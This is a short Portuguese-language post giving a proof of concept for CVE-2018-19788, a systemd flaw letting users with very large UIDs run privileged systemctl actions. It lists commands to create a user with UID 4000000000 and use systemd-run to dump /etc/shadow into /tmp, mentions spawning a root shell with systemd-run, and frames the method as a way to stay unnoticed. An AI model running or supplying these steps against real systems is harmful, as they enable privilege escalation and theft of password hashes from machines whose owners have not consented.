
Explorando CVE-2018-19788 sem shells root
CVE-2018-19788 é um problema onde qualquer usuário com UID acima de INT_MAX (ou seja, 4000000000) pode executar qualquer comando systemctl em uma máquina Linux com systemd, como Ubuntu. (Já existe um artigo para obter um shell root encontrado: aqui). A principal diferença entre este artigo e o artigo completo do shell root é que isso será executado como o próprio usuário em vez de um usuário root (basicamente apenas um PoC para ser honesto)
Para obter um shell root, é tão simples quanto executar systemd-run -t /bin/bash, mas se você quiser ficar fora do radar, pode executar comandos simples para obter arquivos privilegiados sem um terminal. Siga estas etapas para fazer isso:
adduser --uid 4000000000 someusername
su someusername
systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
/tmp:
cat /tmp/results_poc.txt